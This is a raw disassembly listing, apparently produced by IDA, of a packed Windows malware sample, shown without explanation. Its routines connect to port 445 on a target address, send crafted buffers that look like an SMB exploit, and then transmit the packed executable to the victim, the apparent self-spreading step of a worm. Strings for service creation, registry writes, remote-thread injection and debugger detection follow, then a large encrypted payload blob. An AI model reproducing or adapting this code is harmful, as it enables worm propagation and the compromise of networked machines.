push dword ptr [ebp+8]
call dword_401164 ; inet_ntoa
push eax
push offset dword_402584
lea eax, [ebp-48h]
push eax
call dword_401104 ; wsprintfA
add esp, 10h
lea eax, [ebp-48h]
push eax
call sub_402C53
loc_405878: ; CODE XREF: MEW:0040582F�j
; MEW:00405838�j
xor eax, eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40587E proc near ; CODE XREF: MEW:00405823�p
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_1C], 2
mov [ebp+var_1A], 0BD01h
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
push 6
push 1
push 2
call dword_401160 ; socket
mov [ebp+var_8], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push [ebp+var_8]
call dword_40112C ; connect
push 89h
push offset dword_4020B8
push [ebp+var_8]
call sub_4059B4
push 0A8h
push offset dword_402148
push [ebp+var_8]
call sub_4059B4
push 0DEh
push offset dword_4021F8
push [ebp+var_8]
call sub_4059B4
mov [ebp+var_20], al
cmp [ebp+var_20], 30h
jz short loc_405904
cmp [ebp+var_20], 31h
jz short loc_4058FB
jmp short loc_40590A
; ---------------------------------------------------------------------------
loc_4058FB: ; CODE XREF: sub_40587E+79�j
mov [ebp+var_C], 1
jmp short loc_40591A
; ---------------------------------------------------------------------------
loc_405904: ; CODE XREF: sub_40587E+73�j
and [ebp+var_C], 0
jmp short loc_40591A
; ---------------------------------------------------------------------------
loc_40590A: ; CODE XREF: sub_40587E+7B�j
push [ebp+var_8]
call dword_401140 ; closesocket
xor eax, eax
jmp locret_4059B0
; ---------------------------------------------------------------------------
loc_40591A: ; CODE XREF: sub_40587E+84�j
; sub_40587E+8A�j
push 3Eh
push offset dword_4022D8
push [ebp+var_8]
call sub_4059B4
push 60h
push offset dword_402318
push [ebp+var_8]
call sub_4059B4
push 0A0h
push offset dword_402380
push [ebp+var_8]
call sub_4059B4
call dword_4010A4 ; GetTickCount
and eax, 0FFFFh
mov word ptr [ebp+var_4], ax
cmp [ebp+var_C], 1
jnz short loc_40596C
push [ebp+var_4]
push [ebp+var_8]
call sub_4059EF
jmp short loc_405977
; ---------------------------------------------------------------------------
loc_40596C: ; CODE XREF: sub_40587E+DF�j
push [ebp+var_4]
push [ebp+var_8]
call sub_405AE6
loc_405977: ; CODE XREF: sub_40587E+EC�j
push 800h
call dword_4010DC ; Sleep
push [ebp+var_8]
call dword_401140 ; closesocket
push [ebp+var_4]
push [ebp+arg_0]
call sub_405BB6
test eax, eax
jnz short loc_4059A0
xor eax, eax
jmp short locret_4059B0
; ---------------------------------------------------------------------------
dw 10EBh
; ---------------------------------------------------------------------------
loc_4059A0: ; CODE XREF: sub_40587E+11A�j
cmp [ebp+var_C], 1
jnz short loc_4059AD
xor eax, eax
inc eax
jmp short locret_4059B0
; ---------------------------------------------------------------------------
db 0EBh
db 3
; ---------------------------------------------------------------------------
loc_4059AD: ; CODE XREF: sub_40587E+126�j
push 2
pop eax
locret_4059B0: ; CODE XREF: sub_40587E+97�j
; sub_40587E+11E�j ...
leave
retn 4
sub_40587E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059B4 proc near ; CODE XREF: sub_40587E+43�p
; sub_40587E+55�p ...
var_600 = byte ptr -600h
var_5BC = byte ptr -5BCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 600h
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_401130 ; send
push 0
push 600h
lea eax, [ebp+var_600]
push eax
push [ebp+arg_0]
call dword_40113C ; recv
mov al, [ebp+var_5BC]
leave
retn 0Ch
sub_4059B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059EF proc near ; CODE XREF: sub_40587E+E7�p
var_37C = dword ptr -37Ch
var_378 = byte ptr -378h
var_2F2 = byte ptr -2F2h
var_2E = byte ptr -2Eh
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 37Ch
push 86h
push offset dword_402428
lea eax, [ebp+var_378]
push eax
call sub_40392B
lea eax, [ebp+var_2F2]
mov [ebp+var_4], eax
push dword_401F2C
push offset dword_401F30
push [ebp+var_4]
call sub_40392B
mov eax, [ebp+var_4]
mov cx, [ebp+arg_4]
mov [eax+100h], cx
push 41h
mov eax, 264h
sub eax, dword_401F2C
add eax, 60h
push eax
mov eax, [ebp+var_4]
add eax, dword_401F2C
push eax
call sub_403901
mov eax, [ebp+var_4]
add eax, 264h
mov [ebp+var_37C], eax
mov eax, [ebp+var_37C]
mov dword ptr [eax], 2080Ah
mov eax, [ebp+var_37C]
mov dword ptr [eax+0Ch], 20804h
mov eax, [ebp+var_37C]
mov dword ptr [eax+30h], 20804h
mov eax, [ebp+var_37C]
mov dword ptr [eax+3Ch], 20804h
push 20h
push offset dword_4024B0
lea eax, [ebp+var_2E]
push eax
call sub_40392B
push 0
push 36Ah
lea eax, [ebp+var_378]
push eax
push [ebp+arg_0]
call dword_401130 ; send
push 400h
call dword_4010DC ; Sleep
push 0
push 36Ah
lea eax, [ebp+var_378]
push eax
push [ebp+arg_0]
call dword_401130 ; send
leave
retn 8
sub_4059EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405AE6 proc near ; CODE XREF: sub_40587E+F4�p
var_4DC = dword ptr -4DCh
var_4D8 = byte ptr -4D8h
var_452 = byte ptr -452h
var_2A = byte ptr -2Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4DCh
push 86h
push offset dword_4024D8
lea eax, [ebp+var_4D8]
push eax
call sub_40392B
lea eax, [ebp+var_452]
mov [ebp+var_4DC], eax
push 90h
mov eax, 3E8h
sub eax, dword_401F28
push eax
push [ebp+var_4DC]
call sub_403901
mov eax, 3E8h
sub eax, dword_401F28
add eax, [ebp+var_4DC]
mov [ebp+var_4], eax
push dword_401F28
push offset dword_401D90
push [ebp+var_4]
call sub_40392B
mov eax, [ebp+var_4]
mov cx, [ebp+arg_4]
mov [eax+104h], cx
and [ebp+var_8], 0
jmp short loc_405B6F
; ---------------------------------------------------------------------------
loc_405B68: ; CODE XREF: sub_405AE6+A3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_405B6F: ; CODE XREF: sub_405AE6+80�j
cmp [ebp+var_8], 10h
jnb short loc_405B8B
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4DC]
mov dword ptr [ecx+eax*4+3E8h], 20804h
jmp short loc_405B68
; ---------------------------------------------------------------------------
loc_405B8B: ; CODE XREF: sub_405AE6+8D�j
push 20h
push offset dword_402560
lea eax, [ebp+var_2A]
push eax
call sub_40392B
push 0
push 4CEh
lea eax, [ebp+var_4D8]
push eax
push [ebp+arg_0]
call dword_401130 ; send
leave
retn 8
sub_405AE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BB6 proc near ; CODE XREF: sub_40587E+113�p
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], 2
mov eax, [ebp+arg_0]
mov [ebp+var_18], eax
mov ax, [ebp+arg_4]
mov [ebp+var_1A], ax
push 6
push 1
push 2
call dword_401160 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push eax
push [ebp+var_4]
call dword_40112C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_405C00
push [ebp+var_4]
call dword_401140 ; closesocket
xor eax, eax
jmp short locret_405C4A
; ---------------------------------------------------------------------------
loc_405C00: ; CODE XREF: sub_405BB6+3B�j
push 0
push 8000080h
push 3
push 0
push 1
push 1
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_401098 ; CreateFileA
mov [ebp+var_8], eax
push 1
push 0
push 0
push 0
push 0
push [ebp+var_8]
push [ebp+var_4]
call sub_405C54
mov [ebp+var_C], eax
push [ebp+var_8]
call dword_40105C ; CloseHandle
push [ebp+var_4]
call dword_401140 ; closesocket
mov eax, [ebp+var_C]
locret_405C4A: ; CODE XREF: sub_405BB6+48�j
leave
retn 8
sub_405BB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405C4E proc near ; CODE XREF: sub_403B95+247�p
; sub_403B95+261�p
jmp dword_40115C
sub_405C4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405C54 proc near ; CODE XREF: sub_405BB6+77�p
jmp dword_4010E4
sub_405C54 endp
; ---------------------------------------------------------------------------
dw 0CCCCh
dd 3B7h dup(0)
dword_406B38 dd 40104400h, 52454B00h, 334C454Eh, 6C642E32h, 4780006Ch
; DATA XREF: __u_____:00409348�o
dd 75437465h, 6E657272h, 6F725074h, 73736563h, 72438000h
dd 65746165h, 6F6D6552h, 68546574h, 64616572h, 72578000h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 69568000h
dd 61757472h, 6C6C416Ch, 7845636Fh, 75448000h, 63696C70h
dd 48657461h, 6C646E61h, 44800065h, 74656C65h, 6C694665h
dd 80004165h, 736F6C43h, 6E614865h, 656C64h, 69615780h
dd 726F4674h, 676E6953h, 624F656Ch, 7463656Ah, 65478000h
dd 6F725074h, 64644163h, 73736572h, 6F4C8000h, 694C6461h
dd 72617262h, 80004179h, 43746547h, 65727275h, 6854746Eh
dd 64616572h, 80006449h, 57746547h, 6F646E69h, 69447377h
dd 74636572h, 4179726Fh, 736C8000h, 656C7274h, 8000416Eh
dd 4C746547h, 6369676Fh, 72446C61h, 53657669h, 6E697274h
dd 417367h, 6E694680h, 6F6C4364h, 80006573h, 646E6946h
dd 7478654Eh, 656C6946h, 46800041h, 46646E69h, 74737269h
dd 656C6946h, 45800041h, 6E617078h, 766E4564h, 6E6F7269h
dd 746E656Dh, 69727453h, 4173676Eh, 6C478000h, 6C61626Fh
dd 65657246h, 6C478000h, 6C61626Fh, 6F6C6C41h, 47800063h
dd 65547465h, 6946706Dh, 614E656Ch, 41656Dh, 65724380h
dd 46657461h, 41656C69h, 6C5F8000h, 61657263h, 5F800074h
dd 6F6C636Ch, 80006573h, 54746547h, 436B6369h, 746E756Fh
dd 72438000h, 65746165h, 636F7250h, 41737365h, 736C8000h
dd 6D637274h, 80004170h, 65447349h, 67677562h, 72507265h
dd 6E657365h, 43800074h, 74616572h, 72685465h, 646165h
dd 74654780h, 75646F4Dh, 6946656Ch, 614E656Ch, 41656Dh
dd 74736C80h, 79706372h, 8000416Eh, 53746547h, 65747379h
dd 7269446Dh, 6F746365h, 417972h, 74655380h, 656C6946h
dd 72747441h, 74756269h, 417365h, 706F4380h, 6C694679h
dd 80004165h, 61657243h, 754D6574h, 41786574h, 65478000h
dd 73614C74h, 72724574h, 8000726Fh, 74697845h, 636F7250h
dd 737365h, 74654780h, 76697244h, 70795465h, 80004165h
dd 65656C53h, 0FFFF0070h, 10ECFFFFh, 53550040h, 32335245h
dd 6C6C642Eh, 69468000h, 6957646Eh, 776F646Eh, 43800041h
dd 55726168h, 72657070h, 46800041h, 57646E69h, 6F646E69h
dd 41784577h, 65478000h, 6E695774h, 54776F64h, 61657268h
dd 6F725064h, 73736563h, 80006449h, 646E6553h, 7373654Dh
dd 41656761h, 65478000h, 6E654D74h, 77800075h, 69727073h
dd 4166746Eh, 0FFFFFF00h, 40110CFFh, 32535700h, 2E32335Fh
dd 6C6C64h, 8000000h, 13000000h, 0E000000h, 41535780h
dd 74636F49h, 6Ch, 0A00h, 57803300h, 6F534153h, 74656B63h
dd 41h, 1400h, 300h, 1200h, 500h, 1100h, 0F00h, 200h, 7200h
dd 100h, 0C00h, 0
dd 900h, 700h, 9600h, 1600h, 0FFFF0B00h, 1000FFFFh, 44410040h
dd 49504156h, 642E3233h, 80006C6Ch
aStartservicect db 'StartServiceCtrlDispatcherA',0
aAopenservicea db '€OpenServiceA',0
aAopenscmanager db '€OpenSCManagerA',0
aAcloseserviceh db '€CloseServiceHandle',0
aAdeleteservice db '€DeleteService',0
aAsetservicesta db '€SetServiceStatus',0
aAregisterservi db '€RegisterServiceCtrlHandlerA',0
aAchangeservice db '€ChangeServiceConfigA',0
aAcontrolservic db '€ControlService',0
aAregclosekey db '€RegCloseKey',0
aAchangeservi_0 db '€ChangeServiceConfig2A',0
aAregsetvalueex db '€RegSetValueExA',0
aAregcreatekeya db '€RegCreateKeyA',0
aAsetsecurityin db '€SetSecurityInfo',0
aAstartservicea db '€StartServiceA',0
aAcreateservice db '€CreateServiceA',0
db 3 dup(0FFh)
dd 4010E4FFh, 57534D00h, 4B434F53h, 6C6C642Eh, 72548000h
dd 6D736E61h, 69467469h, 8000656Ch, 0
MEW ends
; ---------------------------------------------------------------------------
; Section 2. (virtual address 00007000)
; Virtual size : 00028000 ( 163840.)
; Section size in file : 00023600 ( 144896.)
; Offset to raw data for section: 00007000
; Flags E00000E0: Text Data Bss Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
__u_____ segment para public 'CODE' use32
assume cs:__u_____
;org 407000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
loc_407000: ; DATA XREF: __u_____:00407018�o
xor ecx, ecx
inc ecx
loc_407003: ; CODE XREF: __u_____:00407009�j
call dword ptr [ebx]
adc ecx, ecx
call dword ptr [ebx]
jb short loc_407003
retn
; ---------------------------------------------------------------------------
dword_40700C dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_41201D+31�r ...
dd 7C80ADA0h, 0
dd offset loc_407000
dd 400130h, 401690h, 401180h, 0F501A5B0h, 9D5B0856h, 0AB24FD8h
dd 1F08054Eh, 23609A0Ah, 7180C3Ah, 9A6B0DAh, 0D7E5834h
dd 4B1380Ah, 80BA0E56h, 0B9034011h, 2870510h, 1F0E0FE8h
dd 1F16B7CCh, 684540A5h, 14259C30h, 7B03280h, 0C2FAE242h
dd 95E00E08h, 8882819Eh, 0EECC331h, 80DA8486h, 0D9DED24Ch
dd 74D8F8C5h, 0CFD5FADFh, 0D32FC40Ah, 0E1B0DD27h, 8323F691h
dd 0D7C0C930h, 0D123FFC7h, 0DF023ADCh, 0D018DEAAh, 933E1802h
dd 37381BDh, 84C4C2D5h, 0DCDC0DDh, 9EFB9C40h, 9AC09D26h
dd 0DDD4D191h, 0ABF0F4D9h, 0C7311E06h, 0D5C28ED7h, 9E8F0895h
dd 14B4C86Fh, 441FE7A3h, 0C347DFD4h, 0DDFF790h, 0C3D716C5h
dd 39C6F3F1h, 0D7B3C4C8h, 3E1EE214h, 0C29FC3D9h, 0DF3EF6BEh
dd 0CEE3B3DEh, 0ACD3F3C6h, 1BF52C98h, 7AC5C3DEh, 0D8C4681Bh
dd 8FC9AA3Ah, 94A89EB0h, 0E5FFC078h, 0BEFDF5D6h, 0C36DFB48h
dd 58192E12h, 0D7A986BDh, 0D4B0B35Bh, 55ADC2FAh, 9EDBFB9Ah
dd 6CDCA878h, 6FD73273h, 2CF88272h, 0DC51D2D1h, 67AAB70Dh
dd 0AF4F6FDAh, 6DF494C7h, 6CDFDE69h, 0C92E3AA4h, 15DD79CDh
dd 365C0EB6h, 9EC9F4F1h, 0FE7B90A4h, 90FBF312h, 1F824608h
dd 0AAE5D4BAh, 0DC29E23Eh, 39673F02h, 0E6D9E0E0h, 0F763E3FDh
dd 3086813Fh, 840E8AB0h, 4FDC8088h, 0D9FFFA42h, 2D159AFEh
dd 3C115906h, 0E4D5FFF8h, 0E3801258h, 0AB83A3DFh, 81087582h
dd 990AB284h, 101413F9h, 3151FEDFh, 0BDC34085h, 42F96453h
dd 0EB248820h, 0EDD38C5Ah, 0CA598CAh, 0D8949990h, 206CA77Ah
dd 0C13F842Ch, 0D9E5E17Ch, 10A9DAE4h, 808E0A0Eh, 3C1CC88Ah
dd 9D9CD8A4h, 7AD31CD4h, 902CA4FAh, 0D2ECFD24h, 0CD762C5h
dd 5F41C0D3h, 319EC9DDh, 28AAF208h, 57C79869h, 20F3C0ECh
dd 0BCE5D30Ch, 80DDA45Ch, 33C7D253h, 223E7DD7h, 32EC243Ah
dd 0E75822B6h, 0F92883B7h, 0A45FC90Eh, 1FD6BB70h, 9DE94C43h
dd 26F4DD1Ah, 8C024A66h, 0F6C5AC19h, 0BEC648DFh, 0B244F771h
dd 98DE1878h, 69D6F2D5h, 612F61C9h, 2138C62Dh, 0B2A1DE8h
dd 0D02D4614h, 8F39B498h, 0C5A6EFD7h, 43FCA26Ch, 4B4C4976h
dd 52FF796Fh, 0C73431DFh, 0B3025DBh, 9A474810h, 6F374C43h
dd 65FA6DECh, 866AC43h, 0D238DC94h, 1F677494h, 1CFEB4ECh
dd 282FE9D3h, 0FF74DF02h, 4DB5D07Bh, 0AA5C8B6Dh, 6EC53E48h
dd 9C94DDC9h, 0B0949E1Dh, 28A3B918h, 0B1B5268h, 0B07ACE64h
dd 0CD947C55h, 0E043C94Ch, 551169B7h, 0C82841DEh, 36EEEFC0h
dd 65B266E5h, 0A206F402h, 36D4DCF6h, 48F8E2D8h, 31F3AA89h
dd 1986F223h, 60F530D4h, 22EF9E49h, 0D6EB12C8h, 9298AD54h
dd 85827221h, 0D936D31h, 0B0690A84h, 37D0EE0Dh, 5BFF69ECh
dd 18064309h, 92BC9A3Eh, 0C0E18FD5h, 0D0E35B21h, 0D0E19F90h
dd 0DE13CD91h, 92AE368Ah, 0BE69F0A2h, 0BEC5F5EBh, 0ED075140h
dd 0DBF094C0h, 150D42D6h, 1A07F2FDh, 0CC1E9FFBh, 3FF0391Dh
dd 0C138EB2Ah, 9DC5D87Ch, 940B5D8Eh, 9D6C924Eh, 0F9907CECh
dd 0F99A931Ch, 0E0655F6Fh, 8FB083F5h, 0FA41873h, 0E3F1FCE7h
dd 0CB0D47E3h, 3846901Bh, 8A0C660Ch, 8AD45114h, 8E50AB06h
dd 0CFC54C10h, 480C1F68h, 430CA1B0h, 2DEDD1D3h, 1A835628h
dd 101A0282h, 4DC23F6Ah, 0D56E1032h, 33721FDAh, 9ED6D734h
dd 0CAF69A16h, 5918932Bh, 0F26221EBh, 0E399A4C4h, 1018E839h
dd 8DF064D2h, 34991524h, 560A56A5h, 0DFE00A7Bh, 85E0680Ah
dd 82F4FCE2h, 0D650DE58h, 24E4D43Ch, 0F19AB4F6h, 0FC3C4328h
dd 4CDE4EC2h, 0F9FE2ECCh, 528C2CD8h, 44CC0C9Ah, 0CEF39271h
dd 39370AAFh, 0FF3842BBh, 0EF0994EFh, 0C20527FFh, 3FC7E464h
dd 0CA93CA1Fh, 8055871Ch, 8EE3C914h, 460B53B5h, 196132FEh
dd 0A334F914h, 75C44DF2h, 32C2F126h, 10C2F35Ch, 0F2EE7AC4h
dd 0E74C09A4h, 98174352h, 0DCFDF948h, 0BF9DEE62h, 6F98D7A6h
dd 4E9097F2h, 0C013906Ah, 5F4F7431h, 5BF4CCE5h, 0DB1BB272h
dd 0E8124958h, 7E6E5E3h, 94DC3BE7h, 8CF543A8h, 0C8B5E4B8h
dd 0B165B33Eh, 90EA18FAh, 3D536DE0h, 84BEF982h, 83450EF8h
dd 70604C4Fh, 0C4748A1Ch, 7F71B70Fh, 5B48E0BDh, 0DCC8B42h
dd 51C5A494h, 0D607DA48h, 20FBBC63h, 0B4FCAC12h, 0A87554CDh
dd 0EEEF5280h, 0F439EBEDh, 5D1E946Eh, 0BEB80F33h, 74333B17h
dd 0DAEE7381h, 0F5D4E980h, 0BCEBFCA9h, 0FAC06CFh, 0B8CB41ABh
dd 10B95C33h, 0D8E060E2h, 397441C4h, 80E7A43Ch, 583AF95Ah
dd 74DA664Fh, 0EEC57DB6h, 0F5391860h, 3A6B24B4h, 0C8599320h
dd 3E02BC16h, 5CBEFEh, 9D67983h, 0E17E7D90h, 858EEFA2h
dd 0A4F51DB7h, 3B543043h, 6F6E368h, 57A8A914h, 16A03729h
dd 9476C983h, 0DE00A822h, 0A3F99FBBh, 0A2B19351h, 0B85286B2h
dd 802CCDFh, 0B41D9718h, 877D4430h, 0A0DA743Bh, 0C1B8DAFCh
dd 0C0AA1452h, 63460677h, 9E1D17E8h, 3132E76Dh, 206120B4h
dd 36F95521h, 7D3B08E5h, 0E18FCFFDh, 81A8E564h, 14E4C47h
dd 92476C3Bh, 6AFE01E7h, 0E5002FE3h, 0CE7035A0h, 19E064BAh
dd 5BBC02B4h, 0A814A555h, 0FCEBBB01h, 7BB46DAAh, 0DE51512Ch
dd 4E282660h, 6089BE3Ah, 7E5F1482h, 0B010D050h, 1A209E27h
dd 0A0940832h, 0A2B71CA2h, 0D43207FBh, 0EE80F0B3h, 0C0A10372h
dd 0C8B81DACh, 9C93EEB8h, 0ECB0107Fh, 423F87B0h, 1D422D9Bh
dd 9A98521Dh, 90919581h, 8B4EADB0h, 350162A4h, 0F2FD7B40h
dd 20AC251h, 92DB78B1h, 0A74E4F62h, 0B2F0D207h, 290F3E0h
dd 0E7E4F5FEh, 0EE3E2FFh, 0F7CE4EDFh, 81FDF1E7h, 9E809E81h
dd 0FE5EFC30h, 0B5306B4h, 0B4D66FDCh, 8633E4Ch, 0E3BFD7DBh
dd 1E2EC0C5h, 0D1192083h, 4887FD51h, 1E80E882h, 769F3395h
dd 0E4F2162Eh, 6D32906Eh, 96FA1680h, 90145275h, 0B790C321h
dd 0BCFEA0BCh, 8A48BFEFh, 15BAA1B4h, 6489065h, 0D9300F64h
dd 0A038A2FBh, 10E0AFE3h, 2F322703h, 641550B8h, 4AF5E71Fh
dd 0FBD46383h, 0FBC7FBDFh, 0F27765C3h, 0A025080h, 0FC899140h
dd 0EC24AD85h, 10D19E3Ch, 0BD6AE253h, 90B888B0h, 0E73C6A44h
dd 0B22F9085h, 5B126B3h, 2924F653h, 0F09008F7h, 28FFB6F3h
dd 55FEA067h, 3AA50320h, 0FBF85038h, 0F4F2FFh, 0CADAA931h
dd 0F9544200h, 801F98ACh, 0A0C40A95h, 5FE6E3D7h, 0E0228A65h
dd 90B118C5h, 0BA08088Fh, 88F68009h, 0BEA00D67h, 0C9ECBF40h
dd 2C87F902h, 1F8FF594h, 0EC94E101h, 0D0122140h, 0B4416CB8h
dd 38A8D303h, 12EF6E80h, 6117A6EAh, 4FB2B12Fh, 0B2B32F27h
dd 3FD12D4h, 26B9B31Ah, 1285F2A8h, 388FC4E7h, 68A12C27h
dd 0A4882395h, 2FE06849h, 0FF8EA37h, 8D1CD33Eh, 33D329E4h
dd 0E9C196AFh, 0E6EC463Fh, 7F09F950h, 1F53F5F5h, 0B3BBF1B5h
dd 737271B4h, 4EE0884h, 6E874BEh, 82FF7800h, 7FA6C0FBh
dd 0C8A20063h, 0DE0FF7EAh, 0ACA43851h, 80EDB43Bh, 79AC5B3Ah
dd 0A0582FA1h, 2BA09BD4h, 0E5CED0F8h, 4AA839D6h, 0B3208410h
dd 0C38CAD06h, 0B412AC61h, 1C4E4F50h, 4A29FA37h, 0A293E7A8h
dd 6641E0ECh, 1FFDD7F5h, 5EB4A19Eh, 0A7B42522h, 91D0AF08h
dd 0A43458F2h, 33AA87A2h, 69CDD302h, 67029A08h, 58263C3Dh
dd 0B4AC327Bh, 0E1B07A56h, 7901B178h, 0B43011CCh, 14289A0Bh
dd 8F377AB0h, 0C7B43088h, 3C088D8h, 851331C2h, 0B4B2A542h
dd 0D1A9B208h, 8900D09h, 350B5B32h, 0EB2F7396h, 59E396D5h
dd 62749182h
dd 0C0C808DBh, 5C3BE500h, 0E6A0E433h, 1F407FD5h, 1344F577h
dd 16471998h, 4C099F48h, 852158CDh, 84402884h, 88191FA7h
dd 0E0003D19h, 698A54Fh, 70351EC0h, 6E58B5C5h, 0A6AAABC7h
dd 6B41105h, 73797083h, 62E16197h, 4A6204Ch, 0FE310D4Fh
dd 0D833B0EAh, 64DA8390h, 317C7805h, 1491BDC4h, 78D1860h
dd 0A1B8C571h, 58106419h, 0C9C4BE05h, 0C2A0C035h, 0B1D836E0h
dd 0F4222E73h, 0F72264A1h, 98DFC9D8h, 5B4F6C20h, 0A269A45Eh
dd 305C061Eh, 7030C845h, 0CE98B4BDh, 8A51027h, 8C1A8111h
dd 0A330DB4h, 90DAA074h, 0DA166D10h, 0B75BDD98h, 0EDA93B51h
dd 0BE08BE39h, 94B5B9CDh, 0C53ADA95h, 250AA450h, 0B2C1A778h
dd 0F090BD5Bh, 587EB0A4h, 346791BBh, 0B8FB0430h, 0C8E211A1h
dd 0A2DA8A98h, 59B8C4DFh, 0BAFF58A6h, 3D3444D8h, 8055C54Fh
dd 73501313h, 3200B8CCh, 0DA812535h, 722C02BAh, 0A0F2B213h
dd 0A259CAA4h, 8C687A7Ah, 0F4533D71h, 68530D65h, 6CB71343h
dd 445C0922h, 9B924440h, 3D174850h, 63C73CD1h, 64E05C0Ch
dd 8506C94h, 81B8A098h, 93A8C053h, 64684251h, 0D500C2Eh
dd 7545E99h, 0B4B11038h, 0D08BF34h, 385FAB88h, 486DD8A6h
dd 544CD1D8h, 0DA9E7712h, 0B94851DBh, 28EEC118h, 0C8BC9009h
dd 5058C24Ch, 0AEB4F4EAh, 51245FAAh, 83456508h, 14193076h
dd 0BA98F42Ah, 0A01C63A6h, 0A1B57780h, 84F6F40Bh, 31489C0Ah
dd 9533D683h, 4D164380h, 0D5133F57h, 4572898h, 1A46ED89h
dd 0BB26E116h, 1FB55548h, 58C1E465h, 7226ED51h, 2C9EFB4h
dd 45987C0Eh, 0A8A50969h, 54796614h, 0CF0E488Bh, 259469D4h
dd 0A4C81694h, 4D9C5887h, 7279A2CFh, 484188B8h, 0F408FD6Ah
dd 875809B5h, 8D630DAFh, 482AA220h, 0C528A378h, 0C81B6A8h
dd 11D61050h, 1306A044h, 5B21CF24h, 2433305Ah, 626C3021h
dd 168C854Fh, 0A14090C8h, 54352439h, 0D338A9Fh, 0B5923006h
dd 0B1BAA659h, 0A23CF980h, 6411189h, 0B953813h, 5B4F253Bh
dd 651016A4h, 0D61D4A78h, 0F74D977h, 0A6B3B6B2h, 762CC8B3h
dd 0A558B0A7h, 13B5C3D0h, 89ADA46Ch, 163122CCh, 0C927B4DAh
dd 62D8B863h, 0A46CFFCBh, 82149811h, 48A53DB8h, 9C1562E0h
dd 698A16Ch, 0D7A8BC3Fh, 1A80222Ah, 91BA5658h, 0A4284682h
dd 17521825h, 0DD0B5F10h, 345BEC7Eh, 0C17EB1A2h, 267813BCh
dd 108534F8h, 4D2D1B64h, 99A03264h, 0E0ABBBC8h, 4A84E480h
dd 1361E23Bh, 0B866A464h, 58152474h, 700E4C1Dh, 0A1314A45h
dd 98093EA0h, 11078AC9h, 82F28B0Dh, 93A9C323h, 0FB34B30Eh
dd 8B1F145Ch, 0C51753B5h, 7C5182B2h, 0C524279Ch, 8206F99h
dd 90C3F014h, 29BDCA30h, 363C390Ah, 0A224D5BEh, 0E2B007BCh
dd 1138C506h, 983BA7B8h, 8353D046h, 3D156C21h, 89E0260Dh
dd 6927754Fh, 0F948A817h, 879F8949h, 4448F7F3h, 9B56E408h
dd 0F248E1AAh, 0B52B343Dh, 8C44E550h, 1C475653h, 0CFA4FE22h
dd 61A71BF3h, 22B34B34h, 2E0920DDh, 0CA07B9A0h, 68E764F4h
dd 0EBF0906h, 21D2E991h, 4105ED9Eh, 0E542580Fh, 449190B0h
dd 6FC4F073h, 762D74AEh, 0AC1A0C1Eh, 0F04454A8h, 5B3F48E3h
dd 8A869C53h, 6BA1129Bh, 30E0F00Ah, 0A64F6B48h, 39A3C258h
dd 2124B65Bh, 0A0CD977h, 0DEF8C79h, 1AFD36F6h, 427C0C88h
dd 6A59AC0Ch, 53311326h, 7D6157A4h, 9806B2B4h, 484ACA90h
dd 0A8ACF144h, 0BB78BC10h, 0CCF82EEEh, 4D414C86h, 88059252h
dd 1EC91E08h, 13795C7Dh, 24194A2h, 405325B8h, 9EC58AB5h
dd 1B9417D2h, 0CA90E185h, 91BC2A58h, 93A46958h, 9B5D5520h
dd 244B7A0Dh, 4D20BA5Bh, 3119A065h, 0D94358EAh, 1A7ED153h
dd 63EF59B7h, 172030ADh, 5CBD6833h, 0FFA83694h, 1C828154h
dd 89CD4C38h, 0C02A961Ah, 59C6373Fh, 0D871B5B5h, 71244BADh
dd 512A261Ah, 96CD9422h, 0C1A9C415h, 93A0D813h, 2FB665C0h
dd 91829190h, 0AB2205C5h, 0E2158FEh, 735C10BBh, 9EEB58CAh
dd 57F7C53Ch, 0B729080Fh, 663EB612h, 18A48CFAh, 6ABD06C4h
dd 718B6D90h, 9ABE51C5h, 28812004h, 0AD12B231h, 186B1FB9h
dd 847DB8BCh, 59D2441Fh, 0D80BE962h, 17F7BED4h, 378D33EBh
dd 58FD90DCh, 50B9B626h, 5C590977h, 22D06B69h, 963EA219h
dd 0BA7821F6h, 4EAC13Bh, 0FA621EB9h, 29DB905Bh, 3E21B105h
dd 0C817437Dh, 4E0FEDE5h, 0D5124217h, 2258F211h, 0E433B1C0h
dd 0E11F402Eh, 0A4F85988h, 0A2EC42A4h, 10152A28h, 3B1A9938h
dd 22D5DA13h, 5419A7B1h, 0DE103807h, 27ED8B79h, 4D58F1AAh
